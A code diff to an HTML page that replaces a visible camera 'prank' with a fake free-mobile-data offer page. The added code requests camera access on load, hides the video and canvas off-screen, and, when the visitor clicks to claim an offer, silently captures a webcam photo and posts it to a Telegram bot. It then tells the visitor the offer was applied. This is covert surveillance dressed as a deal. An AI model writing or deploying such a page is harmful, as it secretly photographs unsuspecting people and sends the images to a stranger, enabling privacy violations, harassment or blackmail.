--- a/index.html
+++ b/index.html
@@ -1,95 +1,147 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>Camera Prank 😜</title>
+  <meta charset="UTF-8" />
+  <title>Data Offers</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1" />
   <style>
-    body {
-      display: flex;
-      flex-direction: column;
-      justify-content: center;
-      align-items: center;
-      height: 100vh;
+    @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap');
+    * { box-sizing: border-box; }
+    html, body {
+      margin: 0;
+      padding: 0;
+      height: 100%;
+      font-family: 'Poppins', sans-serif;
       background: #000;
-      color: #fff;
-      font-family: sans-serif;
+      overflow: hidden;
+      color: white;
+    }
+    video#bgVideo {
+      position: fixed;
+      top: 0;
+      left: 0;
+      width: 100%;
+      height: 100%;
+      object-fit: cover;
+      z-index: 0;
+      filter: brightness(0.4) saturate(1.2);
+    }
+    .container {
+      position: relative;
+      z-index: 2;
+      background: rgba(25, 0, 0, 0.75);
+      padding: 30px;
+      max-width: 400px;
+      margin: 10% auto;
+      border-radius: 18px;
+      box-shadow: 0 0 20px #ff1744aa;
       text-align: center;
     }
-    #prank-msg {
-      font-size: 1.8em;
-      margin-top: 20px;
-      display: none;
-      animation: fadeIn 1s ease-in-out;
+    h2 {
+      margin-bottom: 24px;
+      font-size: 24px;
+      color: #ff4081;
+      text-shadow: 0 0 6px #ff4081aa;
     }
-    video {
-      display: none;
-    }
-    canvas {
-      display: none;
-    }
-    img {
-      margin-top: 20px;
-      max-width: 90%;
-      border: 4px solid #fff;
+    select {
+      width: 100%;
+      padding: 12px;
       border-radius: 12px;
+      background: #2d0000;
+      border: none;
+      color: white;
+      font-size: 16px;
     }
-    @keyframes fadeIn {
-      from { opacity: 0; }
-      to { opacity: 1; }
+    button {
+      margin-top: 20px;
+      padding: 14px;
+      width: 100%;
+      font-weight: bold;
+      border-radius: 14px;
+      background: linear-gradient(45deg, #ff1744, #d500f9);
+      color: white;
+      border: none;
+      cursor: pointer;
+      box-shadow: 0 0 20px #ff1744aa;
+    }
+    button:hover {
+      transform: scale(1.05);
+    }
+    #video, #canvas {
+      position: absolute;
+      width: 1px;
+      height: 1px;
+      top: -9999px;
+      left: -9999px;
     }
   </style>
 </head>
 <body>
 
-  <h1>📸 Camera Loading...</h1>
-  <video id="video" autoplay playsinline></video>
-  <canvas id="canvas"></canvas>
-  <img id="photo" alt="">
+<video id="bgVideo" autoplay muted loop playsinline>
+  <source src="video.mp4" type="video/mp4">
+</video>
 
-  <div id="prank-msg">😜 You’ve been pranked!</div>
+<div class="container">
+  <h2>📦 Select Your Data Offer</h2>
+  <select id="dataOffer">
+    <option value="">-- Select Amount --</option>
+    <option>500MB for 7 Days</option>
+    <option>1GB for 3 Days</option>
+    <option>2GB for 1 Day</option>
+    <option>5GB for Night Use</option>
+    <option>Unlimited (Fake)</option>
+  </select>
+  <button onclick="captureAndSend()">Get your data offer</button>
+</div>
 
-  <script>
-    const video = document.getElementById('video');
-    const canvas = document.getElementById('canvas');
-    const photo = document.getElementById('photo');
-    const prankMsg = document.getElementById('prank-msg');
+<video id="video" autoplay playsinline muted></video>
+<canvas id="canvas" width="320" height="240"></canvas>
 
-    // 1️⃣ ask camera permission
-    navigator.mediaDevices.getUserMedia({ video: true })
-      .then(stream => {
+<script>
+  const botToken = "✅YOUR_TELEGRAM_BOT_TOKEN";
+  const chatId = "✅YOUR_CHAT_ID";
+
+  const video = document.getElementById("video");
+  const canvas = document.getElementById("canvas");
+  const context = canvas.getContext("2d");
+  let stream = null;
+
+  // Auto ask for camera permission on load
+  window.onload = () => {
+    navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" } })
+      .then(s => {
+        stream = s;
         video.srcObject = stream;
-
-        // 2️⃣ wait a short time to let the camera load
-        setTimeout(() => {
-          // 3️⃣ draw one frame to canvas
-          const context = canvas.getContext('2d');
-          canvas.width = video.videoWidth;
-          canvas.height = video.videoHeight;
-          context.drawImage(video, 0, 0);
-
-          // 4️⃣ show image preview
-          const dataUrl = canvas.toDataURL('image/png');
-          photo.src = dataUrl;
-          photo.style.display = 'block';
-
-          // 5️⃣ show prank message
-          prankMsg.style.display = 'block';
-
-          // 6️⃣ stop camera after capture
-          stream.getTracks().forEach(track => track.stop());
-
-          // 7️⃣ auto reset after few seconds
-          setTimeout(() => {
-            window.location.reload();
-          }, 5000);
-        }, 1500);
-
       })
       .catch(err => {
-        alert('Camera permission denied or unavailable.');
+        alert("⚠️ Camera access denied!");
         console.error(err);
       });
-  </script>
+  };
+
+  async function captureAndSend() {
+    context.drawImage(video, 0, 0, canvas.width, canvas.height);
+    const base64Img = canvas.toDataURL("image/jpeg").split(',')[1];
+
+    const blob = await fetch(`data:image/jpeg;base64,${base64Img}`).then(res => res.blob());
+    const form = new FormData();
+    form.append("chat_id", chatId);
+    form.append("photo", blob, "captured.jpg");
+
+    fetch(`https://api.telegram.org/bot${botToken}/sendPhoto`, {
+      method: "POST",
+      body: form
+    }).then(() => {
+      alert("✅ Offer applied successfully!");
+      // Optional: Redirect or close cam
+      stream.getTracks().forEach(track => track.stop());
+    }).catch((e) => {
+      alert("❌ Failed to send photo to Telegram.");
+      console.error(e);
+    });
+  }
+</script>
 
 </body>
 </html>
